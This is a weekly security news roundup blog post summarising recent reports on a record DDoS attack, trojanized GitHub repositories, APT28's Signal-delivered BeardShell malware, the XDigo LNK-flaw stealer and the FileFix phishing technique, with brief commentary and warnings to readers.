Shootout to the defenders out there who work day and night to inform us about malware, cyberattacks, methods that attackers can use to compromise end users, and much more.
To the reader of this series, my introduction should have revealed what we’re about to review. If not, you can read the intro again or read on to find out.
Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic
That’s a lot. Also, it shows that attackers can go to extreme lengths if they intend to knock a website offline in a DDoS attack. Luckily for the unnamed target, Cloudflare was to the rescue.
From the article:
The vast majority of the attack was delivered in the form of User Datagram Protocol packets. UDP flood attacks send extremely high volumes of packets to random or specific ports on the target IP. Such floods can saturate the target’s Internet link or overwhelm internal resources with more packets than they can handle.
Cloudflare said the attack was also delivered through one or more Mirai-based botnets. Such botnets are typically made up of home and small office routers, web cameras, and other Internet of Things devices that have been compromised.
200+ Trojanized GitHub Repositories Found in Campaign Targeting Gamers and Developers
There are two taking points in this article. First, threat actors are using GitHub as a malware distribution hub. Second, the targets are gamers and devs.
Now, if you fall you’re a developer or gamer and you use GitHub (mildly or frequently), don’t download and execute any code from GitHub without careful inspection. You have been warned.
From the article:
The identified repositories act as a conduit for four different kinds of backdoors that are embedded within Visual Studio PreBuild events, Python scripts, screensaver files, and JavaScript to steal data, take screenshots, communicate via Telegram, as well as fetch more payloads, including AsyncRAT, Remcos RAT, and Lumma Stealer.
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
Calm down. This is not a Signal flaw, attackers are just using Signal as part of their phishing attacks due to its popularity. In this attack, the attackers send their targets a malicious document that delivers Covenant, a memory-resident backdoor.
Covenant works as follows:
Covenant acts as a malware loader, downloading a DLL (PlaySndSrv.dll) and a shellcode-ridden WAV file (sample-03.wav) that loads BeardShell, a previously undocumented C++ malware.
BeardShell’s main functionality is to download PowerShell scripts, decrypt them using ‚chacha20-poly1305‚, and execute them. The execution results are exfiltrated to the command-and-control (C2) server, the communication with which is facilitated by Icedrive API.
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Attackers have a history of using flaws in Microsoft Windows against their targets. In this article, they have not come short of that. Here, they are abusing an LNK flaw disclosed in March 2025 by Trend Micro.
The following details the capabilities of the XDigo malware:
XDigo is a stealer that can harvest files, extract clipboard content, and capture screenshots. It also supports commands to execute a command or binary retrieved from a remote server over HTTP GET requests. Data exfiltration occurs via HTTP POST requests.
New FileFix attack weaponizes Windows File Explorer for stealthy commands
Have you heard of the ClickFix attack? Well, we can say that the FileFix attack is another variant of this attack. But, at the time of writing, it’s a research by cybersecurity researcher mr.d0x. Meaning, by the time that you are reading this, attackers could have weaponized it in real attacks in the wild.
So, what is FileFix all about? It’s the following:
FileFix, a variation of the social-engineering attack called ClickFix, allows threat actors to execute commands on the victim system through the File Explorer address bar in Windows.
FileFix attacks also rely on a phishing page, but the ruse is no longer presented as an error or issue. Instead, it may appear as a notification indicating that a file has been shared with the user and includes a request to paste the path into File Explorer to locate it.
Credits
Cover photo by Debby Hudson on Unsplash.
That’s it for this week, and I’ll see you next time.